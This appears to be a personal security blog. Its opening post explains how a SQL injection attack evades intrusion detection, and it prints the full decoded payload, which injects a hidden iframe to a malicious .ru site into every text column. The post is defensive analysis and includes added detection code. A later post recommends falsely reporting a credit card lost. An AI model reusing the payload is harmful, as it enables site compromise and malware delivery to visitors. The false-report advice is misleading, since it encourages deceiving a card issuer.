
Michael N. Dundas

A place to record my thoughts and musings.

A friend and co-worker of mine, Jerry Mangiarelli, recently posted about a SQL injection attack that he has been following.  You can read his post here.  As he indicates, it is not a new attack, nor a very complex one.  If you are interested in more details of the attack, SANS has a more detailed review of the attack available here.  My focus is not so much on the attack itself, but on detecting the attack with security devices and why that is a harder problem than many realize.

I think this attack is a really good example of how difficult it is for firewall, IPS, and IDS vendors to detect these types of attacks.  While the ability to do so is improving every day, and vendors will claim they can (and in some cases they can), the bad guys do have the advantage.  For the purposes of this post, I want to focus on how the attack attempts to hide from deployed security systems.  This attack is a great example of how easy it is to evade detection systems, for people who are not technically dealing with attacks day to day and wonder why it is so hard.

The key to this attack is the CAST function.  This function (which is available in many programming languages) converts one data type to another.  A set of integers to a letter, or a decimal number to a hexadecimal number, are two examples.  In the attack, hexadecimal is used to mask the alphanumeric requests to the database.

If you look at the actual CAST function request, you see a 0x (meaning the characters that follow are in hexadecimal base) followed by a long string of hexadecimal digits.

The CAST function converts the hexadecimal above to alphanumeric text.  The result of that conversion is:

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

Now you can see that this looks much more like a SQL statement; it was just masked.  Where it becomes difficult for IPS/IDS vendors is that the translation I did above doesn’t happen until the statement reaches the SQL engine of the targeted database.  So in flight across the network it appears as hexadecimal.  Do you design your IPS/IDS systems with a SQL engine that performs this conversion on every command?  That takes time and resources.  And what would you trigger on exactly in the decoded section above?  The most logical thing to detect on in the decoded section, the attackers have hidden yet again.

If you look carefully, there is a second CAST function nested within the first CAST function.

caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E

If you convert the hexadecimal in this inner CAST function you get:

<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>

This would be the logical thing to detect: a SQL query containing an HTML IFRAME tag pointing to an unknown external website.  And this is the attack.  The problem is that the IPS/IDS, firewall or other security device would have to do the extra work of decoding the CAST nested within the CAST function.

Processing recursively is resource intensive.  How many times do you recurse through the CAST function?  Are there other functions in SQL you should check?  What if it is not hexadecimal but octal or some other numerical base?
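To make the recursion question concrete, here is a small, bounded decoder written for this post (it is an added example, not code from the original page or any vendor product).  It peels 0x literals layer by layer, stops at an explicit depth limit, and reports which indicators appear at which layer; the request it scans is constructed to mirror the nested CAST structure described above, with a placeholder host name, and it also goes one step beyond the post by handling NVARCHAR payloads, which are UTF-16LE on the wire.

```python
"""Bounded, recursive decoding of SQL hex literals as a detection aid.

Added example written for this post; it is not code from the original page.
The request below is constructed: an outer CAST() whose hex payload is SQL
that itself contains a CAST() whose hex payload is an <iframe> (the host
name is a placeholder, the cursor loop is abridged).
"""
import re
from typing import List, Optional, Tuple

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

# Indicators to trigger on once a layer is decoded. Matching is done on
# lower-cased text because the injected SQL in the post uses random casing.
INDICATORS = ("<iframe", "<script", "table_cursor", "sysobjects", "syscolumns", "exec(")

# The post asks "how many times do you recurse?": make the answer an explicit,
# bounded parameter, and cap literal size so the decoder is not a resource sink.
MAX_DEPTH = 3
MAX_LITERAL_BYTES = 64 * 1024


def decode_literal(hexdigits: str) -> Optional[str]:
    """Decode a 0x literal the way CAST(... AS VARCHAR/NVARCHAR) would.

    Returns None when the bytes are not printable text in either encoding.
    """
    if len(hexdigits) % 2 or len(hexdigits) // 2 > MAX_LITERAL_BYTES:
        return None
    raw = bytes.fromhex(hexdigits)
    # VARCHAR payloads are single-byte; NVARCHAR payloads are UTF-16LE
    # (every other byte is 0x00, which fails the printable check as ASCII).
    for encoding in ("ascii", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None


def scan(sql: str, depth: int = 0, max_depth: int = MAX_DEPTH) -> List[Tuple[int, str]]:
    """Return (depth, indicator) hits for `sql` and for every decodable hex
    literal nested inside it, down to `max_depth` layers of CAST(0x...)."""
    hits = []
    lowered = sql.lower()
    for indicator in INDICATORS:
        if indicator in lowered:
            hits.append((depth, indicator))
    if depth >= max_depth:
        return hits
    for match in HEX_LITERAL.finditer(sql):
        decoded = decode_literal(match.group(1))
        if decoded is not None:
            hits.extend(scan(decoded, depth + 1, max_depth))
    return hits


def hex_literal(text: str, encoding: str = "ascii") -> str:
    """Encode text as a 0x literal; used only to build the constructed sample."""
    return "0x" + text.encode(encoding).hex().upper()


# --- Constructed sample (placeholder host, abridged cursor loop) -------------
INNER_HTML = ('<iframe src="http://malicious.example/go.php" width="0" height="0" '
              'style="display:none"></iframe>')
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id ... "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=['+@C+']+CAST("
    + hex_literal(INNER_HTML) + " AS VARCHAR(106))') ..."
)
# What an IDS sees on the wire: one opaque hex blob inside CAST(... AS NVARCHAR).
SAMPLE_REQUEST = ("DECLARE @S NVARCHAR(4000);SET @S=CAST("
                  + hex_literal(INNER_SQL, "utf-16-le")
                  + " AS NVARCHAR(4000));EXEC(@S);--")
BENIGN_REQUEST = "SELECT name FROM products WHERE sku = 0x41424331"  # 'ABC1'

if __name__ == "__main__":
    for label, request in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, scan(request))
        print(label, "depth 1 only:", scan(request, max_depth=1))
```

Running it with `max_depth=1` shows the post's point directly: the cursor loop is flagged, but the `<iframe` at the second layer is never seen.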

While security vendors often claim they can detect the above, there are often many conditions around those claims that they do not explain.  Encryption and nested functions like the one above are but two examples.  These problems go beyond SQL injection as well, and apply to many types of attacks.

When evaluating these technologies, it is important that you have someone on your side who is independent of any vendor.  An employee or consultant who understands your requirements, is technically sound and solid about how the technology works (not just in theory), and can work on your behalf to ensure you understand exactly what the technologies can and cannot do.  You then have a real understanding of the risks and exposures you face.


Kenneth David (@kennethdavid) responded to a post I wrote entitled “Google, Verizon and the creation of private networks”.  My original post is here, and Kenneth’s response is here.  I have never met Kenneth, but I follow him on Twitter as he provides informative tweets.  We have common friends too.  He actually works for a friend of mine.

Kenneth in his response suggested that a highway is a better analogy for how bandwidth is used than electricity.  I completely agree with him.  I have used both analogies many times to explain bandwidth.  For me, I have found that electricity seems to work better.  Maybe because it is similar in the sense that you get a monthly bill, you are typically billed in a unit/time type of format, and it comes into your home.  So while I agree that a highway analogy is in fact more similar to bandwidth usage, using it as an analogy to explain bandwidth to my wife’s step-dad just gets him confused and he misses the point that I am actually trying to get across.  Kenneth also introduced 3 elements that he discussed:

Mobile bandwidth is not unlimited. No resource is unlimited; however, it is true that mobile has some unique characteristics in this regard.  That being said, the data to support the claims comes from the service providers themselves.  We have to assume they are being honest.  If you have done any statistics you realize that data can be manipulated or interpreted to their advantage.  How do we know they are not doing that?  I know people and companies that are hired to do exactly this.

Bandwidth is a resource that is shared. Very true statement; just like the highway, electricity, gas, air etc., most resources are shared.  There is a lot of debate as to how much bandwidth there really is, how much there could be, the cost associated with increasing bandwidth and who should bear that.

Mobile or wireless introduces a little more complexity on the consumer end.  It uses radio frequencies which have to be shared amongst the devices in a particular region.  On top of that you have the complexities of the number of towers in a particular area, the number of users, and the type of terrain (hills, flat, tall buildings).  I am not a cellular expert so I am sure I am not doing it justice.  That being said, I have worked on projects involving wireless and one thing that I found common amongst providers is that the data about frequency and bandwidth usage for a specific tower was sparse, and any data the provider did have was very closely guarded, even from our teams who were trying to help them.

This is one area where I would legislate.  Any service provider in the wireless space would be required to provide real-time access to their cellular usage data.  That data is accessible 24×7 by government.  It is a legal requirement for getting and maintaining a license.  Sounds a little draconian?  I know.  The problem is that we have to trust the service providers to do the right thing.  To do what is best for everyone.  They won’t.  They will do what is best for them and their shareholders and what makes them the most money (they legally have to do this).  If this happens to line up with what is best for everyone, great.  But doing the right thing for everyone is not their goal.  Oversight is needed and it has to be legally enforceable.

Bandwidth is something that can be unfairly leveraged by a single user or group of users unlike any other utility. Not sure I completely agree with this.  I think given the current setup, and investment (or lack of) in wireless and broadband infrastructure, it is easier to exploit bandwidth by a single user or group of users than other utilities.  Utilities such as electricity, gas, and the highway have been around long enough that we have technology and people in place to monitor these resources.  We have years of experience with these resources, their abuse and problems.  As such, we have proven technology in place, and experienced people and procedures to detect and manage problems.  In the service provider world these are not as prevalent.  I worked for a company that provided these types of services.  There are a few problems.  First, the technology is new and developing, unlike electricity and gas, which have been around for years.  Second, the cost to purchase these newly developed and unproven technologies is high.  It is seen as an investment with little to no return, and in a competitive market that is a really tough sell.  Third, the service providers are not sure where all this technology is going either.  Over the last few years it looks like everything is going mobile, and it is, but what is next?  What should they prepare for?  What new technology will they be required to purchase to handle the next ‘wave’ of customer wants?  They don’t know either.

For me it all comes down to oversight, not bandwidth management.  It is not reasonable to assume that a business will do the right thing when it comes into conflict with making money.  As an example, the net neutrality debate has been going on for years.  The only time service providers have made any good faith efforts has been when there is a real threat of regulation.  An infamous ISP in the USA quietly blocked P2P for its users and didn’t tell anyone.  When people suspected and asked if they were blocking, it was denied.  It wasn’t until an annoyed customer with the technical background and know-how sat down and proved they were in fact blocking P2P that they finally admitted it.  I’ve seen policies deployed at service providers to allow quick response times when someone is ‘checking’ the response time, but shape traffic when actually downloading a game (yes, there is technology that will do this and it is deployed).  The customer service representatives are typically unaware of these policies and how they affect customers.  If they are aware, they are not permitted to tell customers what exactly they are doing (hopefully this is changing).

The Internet is no longer a luxury.  It is no longer something the ‘geeks’ just do.  Like electricity, gas, medicine, food and others, it is a necessity to functioning today.  Giving a company in the business of making money off traffic the power to decide what traffic is or is not important is not smart.  There needs to be oversight.  That oversight needs to be independent of the requirement to make money off traffic, have the ability to review (in real time) decisions made around traffic management, and, most importantly, be legally enforceable.


Lots of discussion about the latest Google and Verizon agreement on Net Neutrality, in an attempt to avoid government regulation.  Even our NDP government has commented.  I recall a discussion years ago about creating a ‘new Internet’.  The idea was that it would be a separate network that would be paid for.  Think back prior to the Internet to the days of AOL, and the many dial-up BBSes where you paid to access content on their systems.

If the big ISPs are thinking about creating separate premium networks, they need Google to index them and provide a method for people to find this premium information.  Google wants to index ‘everything’ and be the place to go to find information, so it only makes sense they work with the ISPs to not be left in the cold.

It is too bad Google has backed down on their net neutrality stance.  Their rationalization includes the need to get government and industry to move forward, and the need to create a position of compromise.  No matter; at the end of the day, Google has backed down and changed their position, period.  This unfortunately has large ramifications for Net Neutrality.

To me, the answer is simple.

An ISP should be in the business of moving data quickly. Who originates that data and what the packets or flows contain does not matter to an ISP.  The ISP routes the data to its destination as quickly and efficiently as possible.  They charge appropriately in a competitive and open market for the service.  Using this revenue, they can upgrade and provision their networks accordingly.  This should be legislated as a requirement and enforced, and they should have to justify, if asked by government, why they are doing what they are doing and provide appropriate proof as required.

An ISP should charge accordingly. Enough of the excuses that people won’t pay the appropriate amount of money required so we can upgrade the infrastructure to meet demands.  You are just scared of competition.  If all the ISPs charge for usage (like electrical companies), people will pay it.  They will have to if they want to use the Internet, and I’d argue the Internet is considered a required service, just like electricity.  I’ve read studies showing people will forgo TV service and phone service to keep their Internet.  If you can’t cover your costs and expenses, then go out of business.  There is always competition waiting to service the customers you are not able to.

An ISP should NOT be permitted to be involved with or own any type of content providing service. This should be legislated.  You route packets, monitor links, and manage the network.  That is what you do best.  That is all you are permitted to do, so do it well.  This should be legally enforced.  You do not provide any content; content providers do that.  Just as my electrical company doesn’t provide me with anything more than electricity to my home.  Other businesses provide services that use the electricity, not my electrical company – they provide me with electricity and charge accordingly.

An ISP does NOT monitor content and is not law enforcement. ISPs are experts at moving data, not investigations.  Law enforcement and private companies that specialize in investigations and criminal activity do the investigations.  ISPs never act as law enforcement.  Questioning the legality of the data or activity is not the ISP’s responsibility and they do not care (and should not be held accountable).  Similar to an electrical company where a house is using way more electricity than other typical houses – you provide and charge them accordingly.  If law enforcement is investigating criminal activity (what they do best) and provides you with a warrant to obtain the usage at a particular location you service, you may provide that information to law enforcement, but that is it.  Law enforcement takes that information and does the investigation – that is what they do best.

Is it more complicated than that?  Personally I am doubtful it is.

What do you think an ISP should be legally permitted to do?


Update (Aug 13, 2010 @10:22): Kenneth David (@kennethDavid) wrote a response to my post.  You can read it here.

I have been following the RIM security saga with India and Saudi Arabia.  As I have previously mentioned, I have been in the U.A.E. in the past performing security consulting.  A few facts I know:

All HTTP goes through a proxy. If you connect to a service provider, all your flows go through an HTTP proxy system.  The proxy system scans requests and compares them to a database of categorized sites.  The government provides policies to the service providers, and it is required by law that they are enforced.  They are enforced in real time.  If you attempt to visit an unauthorized site, you will be redirected to a page in Arabic explaining that it is not permitted.  I actually kept a screen capture of the page and was going to post it, but I can’t find it.  However, if you are in Dubai, just try to go to a site that has questionable material.  You will be redirected.  Anyone can do it; it is not a secret.

HTTPS was ready to be implemented. Approximately 2 years ago, they were testing the ability to decrypt SSL on the fly so that they could perform analysis on the requests and grant or deny access as with HTTP traffic.  I am sure this is deployed by now.

Voice Over IP, Instant messaging and other protocols had specific policies. I won’t go into the details here, as I don’t know how public this information is, but there were active policies deployed around these and other protocols.

Privacy is not the same as in North America. In North America, we may feel that privacy is slowly being eroded.  In comparison to Dubai, our policies with respect to privacy are impressive.  The ISP has the right to watch what you are doing and actively grant, block, and log your activities.  It is actually a requirement in order to get a license to be an ISP from the Government.

When Saudi Arabia indicated they were going to ban Research In Motion devices due to the fact the government was unable to decrypt communications as needed, I was hopeful that RIM would say too bad.  Of course that was the idealist in me hoping that RIM, a Canadian company that markets the security of the BlackBerry as one of its key features, would not be compromised.  The realist in me understands that the Middle East is a growing market and from a business perspective RIM has no choice but to be a part of it.  If you want to do business in Canada you have to play by our rules, so it only makes sense that if you want to do business in the U.A.E., you have to play by their rules.  As expected, RIM reached a deal with Saudi Arabia.  They also reached a deal with India earlier this week.

What I find amusing is the latest spin they have put on security given the situation.

RIM made no direct comment on any discussions with the UAE or others, but it sought to reassure customers about the security of their data on BlackBerry networks.  “While RIM does not disclose confidential regulatory discussions that take place with any government, RIM assures its customers that it is committed to continue delivering highly secure and innovative products that satisfy the needs of both customers and governments,” the company said in a statement to customers.

A RIM spokeswoman could not be reached for comment.

RIM said in its statement that under its security system customers have their own encryption key and “only the customer ever possesses a copy” of that key.

While I am sure they have not lied, you can’t have it both ways.  Either you comply with the government request that they can decrypt messages and data as they require, or you don’t.  Any other suggestion implies that the laws within the UAE have changed.  I am not a lawyer, but I haven’t seen any news about new laws protecting UAE citizens’ privacy.  The best part is the last statement, how the customers have their own encryption key that only they possess.  I am sure that statement is true.  But it is what is not said that is telling.  Are there any more encryption keys, other than the one the customer possesses, that apply to the customer’s messages?  Companies that deploy encryption and decryption of email, files, and data in general give each employee a copy of their own key that only they possess.  When encrypting data, the system creates some sort of unique key (let’s call it E) that is actually used to encrypt or decrypt the data.  The E key is then encrypted with the customer’s encryption key (let’s call that key Ec).  The trick with businesses is that the E key is also encrypted with their own key (let’s call it Eb).  If you lose your key (Ec) or refuse to give it up when asked, they can use their key Eb to decrypt and obtain the E key.  Once they have the E key, they can then decrypt the message.  There are several variations of this, but the basic premise from a recovery perspective is the same.
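The recovery scheme just sketched, as an added example for this post (it is not RIM’s, Hushmail’s or any vendor’s actual design): each message gets a fresh data key E, which is wrapped under the customer key Ec and, when an escrow key Eb is supplied, under Eb as well.  The cipher is a constructed toy so the code runs on the standard library alone; a real system would use an AEAD such as AES-GCM.

```python
"""Envelope encryption with a customer wrapping key and an optional escrow key.

Added example for this post; not RIM's or Hushmail's design. The cipher is a
constructed toy (HMAC-SHA256 keystream XOR, no integrity protection) so the
code runs on the standard library alone. Key names follow the post:
E (per-message data key), Ec (customer key), Eb (business/recovery key).
"""
import hashlib
import hmac
import os
from typing import Dict, Optional

NONCE_LEN = 16


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher: XOR data with HMAC-SHA256(key, nonce || counter)
    blocks. Symmetric, so the same call decrypts. Illustrative only."""
    out = bytearray()
    for block_no in range((len(data) + 31) // 32):
        block = hmac.new(key, nonce + block_no.to_bytes(4, "big"), hashlib.sha256).digest()
        chunk = data[block_no * 32:(block_no + 1) * 32]
        out.extend(a ^ b for a, b in zip(chunk, block))
    return bytes(out)


def wrap_key(wrapping_key: bytes, data_key: bytes) -> bytes:
    """Encrypt E under a wrapping key; the random nonce is prefixed to the blob."""
    nonce = os.urandom(NONCE_LEN)
    return nonce + keystream_xor(wrapping_key, nonce, data_key)


def unwrap_key(wrapping_key: bytes, blob: bytes) -> bytes:
    """Inverse of wrap_key."""
    nonce, wrapped = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return keystream_xor(wrapping_key, nonce, wrapped)


def encrypt_message(plaintext: bytes, customer_key: bytes,
                    business_key: Optional[bytes] = None) -> Dict[str, bytes]:
    """Encrypt under a fresh data key E and wrap E for the customer (Ec) and,
    when a business key Eb is supplied, for the business as well.

    The stored record never contains Ec or Eb, so "only the customer ever
    possesses a copy" of Ec is literally true either way; what differs is
    whether a second wrapped copy of E exists.
    """
    data_key = os.urandom(32)                       # E
    nonce = os.urandom(NONCE_LEN)
    record = {
        "nonce": nonce,
        "ciphertext": keystream_xor(data_key, nonce, plaintext),
        "e_for_customer": wrap_key(customer_key, data_key),
    }
    if business_key is not None:
        record["e_for_business"] = wrap_key(business_key, data_key)  # escrow slot
    return record


def decrypt_message(record: Dict[str, bytes], wrapping_key: bytes, holder: str) -> bytes:
    """Recover E with whichever wrapping key the caller holds, then decrypt.

    `holder` is "customer" or "business". With the toy cipher a wrong key
    yields garbage rather than an error; a real AEAD would fail authentication.
    """
    slot = {"customer": "e_for_customer", "business": "e_for_business"}[holder]
    if slot not in record:
        raise KeyError("no wrapped copy of E for " + holder)
    data_key = unwrap_key(wrapping_key, record[slot])
    return keystream_xor(data_key, record["nonce"], record["ciphertext"])


def business_can_recover(record: Dict[str, bytes]) -> bool:
    """The question the post says is left unanswered: is there a second key?"""
    return "e_for_business" in record
```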

This is not the first time this has happened either.  Not sure how many people remember Hushmail.  I wrote about them here.  Hushmail’s marketing was based on the fact that if you used them for email, no one but you could retrieve your email stored on their servers.  Even Hushmail staff were not able to retrieve the email if they wanted to, as they did not have the keys.  (Sound familiar to the RIM article above?)  Yet, when U.S. law enforcement contacted them about an individual they were investigating, Hushmail was able to provide them with 12 CDs filled with unencrypted emails of the individual under investigation.

While I don’t blame RIM for bowing to the governments of India and Saudi Arabia if they wish to do business in their countries, I dislike the spin they are placing on security.  They are misleading the public and playing on the fact that many people do not understand the intricacies of security.  While they are not lying, I strongly suspect they are not being forthright.

When all the dust settles, it is important that people realize that money is what drives business.  You can claim all the morals, goals, and visions you want.  But if at some point these come into conflict and enough money is at stake, compromises will be made.  Security unfortunately is no different.

I have read and been told by researchers and vendors over the years about “best practices” for this technology or for that type of deployment.  I have discussed best practices with clients as a consultant, as a vendor promoting products to a potential customer, and as a consumer of a particular technology or design.  The ‘best practices’ concept seems to come and go over the years.  Recently, the frequency of mention of ‘best practices’ has been dramatically increasing in my world.  I am not sure if this is due to a general trend in the industry, or just myself being back in the financial services world.

I have always been very wary of ‘best practice’ when it is mentioned and when it is applied I tend to scrutinize it.  Here is why.

1. Lessens the sense of ownership. After all, you didn’t really create the solution.  You followed the ‘best practices’ for the particular solution you were deploying.  Sure, you added a few twists and exceptions, but really the bulk of it was already predefined.  If something goes wrong, it is not totally your fault.  After all, you followed best practices, right?

2. Stifles innovation and creativity. You don’t have to come up with a solution, create or design a system to handle a particular problem.  It is already created by ‘best practices’.  Obviously the best practices are proven and smarter people came up with them than your team.  Why re-invent the wheel?

3. Who declared it to be best practice? I have never seen scientific reasoning for why something is considered a best practice.  Typically, the rationalization is that everyone else has done it this way, so it is the ‘best practice’.  If your competitors have all done it this way, then should you really spend the time figuring out if they have done it right?  If they all did it, then obviously it is the best way to go.

4. Used as manipulation by vendors. Every vendor tries to manipulate ‘best practices’ to favour the particular set of technologies they are trying to sell you.  They often do this by ‘teaching’ the customer about best practices and how their product suite best fits.  It also assists them in influencing your decision making process.  By touting ‘best practices’ they can elegantly neutralize employees’ ideas on how to solve a particular problem when their solution may not fit.  They are not personally telling you that your ideas are wrong; the best practices are.  They are just helping you understand so you don’t make a mistake.

I do believe ‘best practices’ have their place.  A project team should consider all ‘best practices’: the ‘best practices’ provided by your current vendor, and the ‘best practices’ provided by your current vendor’s competitors.  The team should research ‘best practices’ that are not vendor related.  These should be given weight, but less weight than the project team’s own opinions.

Ideally, the team comes up with the design that meets the requirements.  Once and only once the team is comfortable with their solution, it is vetted against the ‘best practices’.  Using this approach, the team feels a sense of ownership for the solution.  The team created something based on requirements and their skills and knowledge.  They took into consideration the many ‘best practices’ available, and tweaked their solution where necessary after careful and conscious thought.  If done correctly, the end result is a solution where a sense of ownership is felt, any innovative and unique ideas were considered and incorporated, best practices were given their due consideration, and the best vendor and technologies are chosen.


Grooveshark.com rocks!  I have been using them regularly as a source of music since the fall of 2009.  A couple months ago I even purchased a year subscription I liked them so much.  Why?  Unlike Xmradio and Last.fm, they give me what I want.

I have created a play list for when I run that I periodically update.  I have a separate play list for when I work out, and another for when I am in the office working.  They do not limit play lists or music listening.  They even have Grooveshark Radio, which will pick songs for you based on your criteria selection and taste.  Everything is available without a subscription as well.  The difference between subscription and non subscription is advertisements.  Non subscription users will see advertisements appear on the side of the screen while music is playing.  Obviously these go away when you purchase a subscription.  But that is not why I purchased a subscription.  I purchased a subscription because, unlike others, they gave me the customer what I want.

My wife has an Xmradio in her car and we have a subscription.  The subscription permits you to log on via the web and listen, sort of.  They have a ‘better sounding’ version you can pay extra for to listen on the web.  For basic subscribers that only have a car radio and do not wish to give them more money than we already do, there is a lower quality version if you choose to listen on the web.  In order to run it, I had to use a Windows machine (the only Windows machine in the house is my work one).  I had to run Internet Explorer as apparently Firefox isn’t supported.  Aside from their obvious vehicle penetration, the service is really a subset of what Grooveshark offers at a higher price point, and they are difficult to deploy in the home.

Last.Fm I have already written about here and here.  My views on them have not changed.

If Grooveshark offered an ‘in vehicle’ version of their service I’d sign up.  I’d gladly give the money we pay for our XMradio subscription to them. Based on my feelings about these online services, I found the latest Google Webtrends data interesting.

Grooveshark is on a slow, almost constant trend upwards.  Xmradio.com is the reverse (of course this represents web access, not vehicle access), and Last.fm is heading downward in 2010.

If you use online music services, give Grooveshark a try.  You won’t be disappointed.

Several years ago I was hired to assist with an internal investigation.  The client, a large company, had some concerns about an employee and wanted to covertly gather information and data on what this employee was doing while at work.  For about a week, I sat passively on the network, monitoring the subject’s connections to servers, internet systems, e-mail, instant messaging and any other network connection.  There was not the selection of automated software there is today to accomplish this, so most of it was done with packet sniffers.  I would gather the data, use scripts to extract specific types of data and run it through statistical analysis, and look for data that was ‘different’ or ‘suspect’ in some way.  Basically the goal was to profile the user and compare his activities to other users.  Then, using this profile, identify and focus on things that didn’t fit.  Personally, I found it a little creepy.  Looking into the details of someone’s private life is not really fun; a part of me felt like I was being invasive, not respecting their privacy — and technically that is true.  But it was the job, what I was asked to do.  Sometimes doing things one would prefer not to do is necessary.

One thing I had identified to the client was that the subject was using a type of VoIP software.  They asked if it was possible to listen in on the voice conversations.  I told them it was, and that I could probably get them a copy of the voice conversations the subject had previously had during the time I was monitoring.  I had packet captures, most non-encrypted, so it was just work and time.  At the client’s request, I extracted the VoIP conversations into wmv files, using the date and time of the call as the file name.

At the end of the job, I was having a conversation with the CTO.  He was wondering if there was an automated way to keep audio conversations of all the employees.  At the time, this technology was not as prevalent, cheap, and available to the general public as it is today.  I asked him if he thought that was really appropriate.  I explained that I had just listened in on someone’s private conversations.  Maybe it wasn’t any of the company’s business.  Maybe there were legalities if they were to do that (yes, I was annoyed).  His response was very quick.  “The company has a right to view all data, monitor activity that its equipment or network is used for, period”.  He told me all the employees know this and sign a document to that effect.  I said that made sense.  I asked him what he would think if he was in a confidential conversation on the phone with someone in a different province and Bell had listened in on his conversation?  I said that I assumed he didn’t have a problem with it; after all, it is their network, their devices.  Aside from the angry facial expression, he said that was ‘different’ and they shouldn’t be allowed to do that.

Fast forward to now.  Everyone has a video camera or picture camera on them as a result of mobile phones.  If you are serious about it, you can find all kinds of tiny spy cameras.  Rob Spence has implanted a camera in his eye.  It amuses me when law enforcement gets all concerned about citizens taking their picture and video taping them.  I guess they feel that they should be able to watch and monitor us, but we shouldn’t be able to watch and monitor them.  Of course if they are not doing anything wrong, then they should have nothing to worry about, right?  (That statement is an entire topic in and of itself.)

Everyone has reasons why a particular person or group of people should or should not be monitored.  It really comes down to the basic premise that we as humans don’t want to be monitored, but we want the ability to monitor others, especially if we deem them as a threat.  Government wants the ability to covertly monitor their citizens but do not want organizations covertly monitoring them.  Police want cameras everywhere so they can monitor what is going on and use it to assist with their job, but they don’t want to be video taped in case they get caught doing something controversial, such as Robert Dziekanski being killed by officers at Vancouver airport. The video once released on the Internet, forced police to change their story.  Businesses feel they have a right to monitor their employees, but would have concerns if employees were monitoring some of their activities.

Personally, I think it is futile to attempt to stop one group from monitoring another, especially in public places. It will never be successful. Who do you feel should be able to monitor whom? Under what circumstances and conditions is video or audio surveillance appropriate?


I have a Visa card that I use only when I am on business. The idea being that all charges on that card are business related and are therefore repaid by clients. As such, I am forced, on a regular basis, to walk through all the transactions, ensure I have the appropriate documentation, and submit it to the appropriate parties so that I get the money back. I say forced because I really hate doing expenses, so much so that I will avoid it as much as humanly possible.

I have been traveling for work a fair bit lately, and two months of expenses have piled up. Begrudgingly, I sit down to do my expenses. All the transactions are fine, except for two, one in each month for $6.79 from a company called clickandbuy.com. Not a company I have dealt with. I go to the clickandbuy.com website. In the FAQ section I find an entry describing my problem. In order to contact them electronically, I have to register first, giving them a bunch of information I don't want to give them. The fact is they probably already have the information from whatever method they obtained my credit card information, but I don't want to confirm it; I don't want to be their customer. There is a long distance number I can call if I want a person directly, no toll free number.

Next, I call my Visa company. I get the standard series of endless automated prompts. Eventually I get an option for customers that wish to discuss specific charges on their account. Selecting that option, the first thing the recording system tells me is (paraphrased): If the charge in question is related to an internet transaction, please contact the vendor to resolve the charge. If I still have trouble, I can work with them, because after 45 days the transaction is my responsibility. I wait on the line. Next I receive a message that they are not open right now and to call back during 'normal business hours', which they don't provide.

At this point I have spent approximately 30 minutes of my weekend dealing with two transactions worth $13.58. I am mad at clickandbuy.com and I am furious with my Visa company. How dare they waste my time. How dare they permit a charge to be placed on my card, then make it inconvenient for me to discuss and dispute the charge they put on a card I did not authorize (at least not knowingly). The question becomes, how do I save my time? I call my Visa company back up and select the 'report a lost or stolen Visa' option. I immediately get a person, who is very helpful, and I have a new card coming to me in a few days.

Why did I do this? Well, this happened to my wife about a year ago, and experience is a good teacher. Different financial institution, different scummy vendor. We spent hours of time and frustration on the phone, email, filling out forms, responding to voice mails, waiting on the phone in queues. Not worth it. And since the Visa companies value the merchant and their time more than their customers and my time (this is obvious by their actions), I can play that game too. In five days it will be all fixed, minimal time lost and stress induced for me.

End result is that scummy ClickandBuy.com obtained $13.58 from me due to the despicable and scummy business practices they employ — you are welcome, Clickandbuy.com. $13.58 vs. calling my Visa company repeatedly, having to fight with them, then having them send me forms via snail mail, which I have to fill out, return via snail mail or fax, then wait for them to investigate and decide: easy choice.

As for the company who provides me the Visa, I will receive a new one next week. I may not activate it, however. I am going to look around, maybe select a new provider. Sure, they will probably have similar rules to my current Visa company when it comes to despicable companies like clickandbuy.com. My Visa company is big and I am just a tiny little single customer. But I will do it on principle. I highly recommend that everyone who has a problem like this just call in and report your card lost. They have to terminate the card; they have no choice. They are obviously trying to push the Internet purchasing problem off to their customers rather than come up with a solution. This makes it their problem again, which is where the problem is and should be.

I am not a lawyer, nor am I a politician or a copyright expert. I have been following the copyright debate quite religiously for the last 3-4 years, trying to learn what I can. In Canada, Bill C-32 has been tabled to update the copyright laws. There has been lots of discussion about the Bill, specifically around the digital lock rules in this bill. Big industry wants to protect its materials by making it illegal to remove digital locks, for any reason whatsoever, without permission of the copyright owner. It also seems that it is illegal to publish tools that would assist others to break digital locks. Both of these issues concern me.

See, I do research into security technologies as part of my job. Security is also a personal interest of mine. As an example, I am currently looking into a particular application that uses SSL to encrypt the data between points. In order to do what I need to do for the research, I downloaded an open source tool that basically breaks the SSL. This allows me to work on my research with the application in question. If that tool was not published due to Bill C-32, then that stops me from doing my research. I suppose I could create my own version of the tool, but why would I do that if someone already has a tool readily available? It makes no sense. The most likely response to my specific example is that SSL isn't proprietary, so it does not matter. That is true in this case, but what about when I am evaluating a BlackBerry PDA or an iPhone? I suspect RIM and Apple might not take too kindly to me exposing problems in their software. See, the current Bill C-32 might allow them to do this. That is bad for security, bad for keeping companies honest.

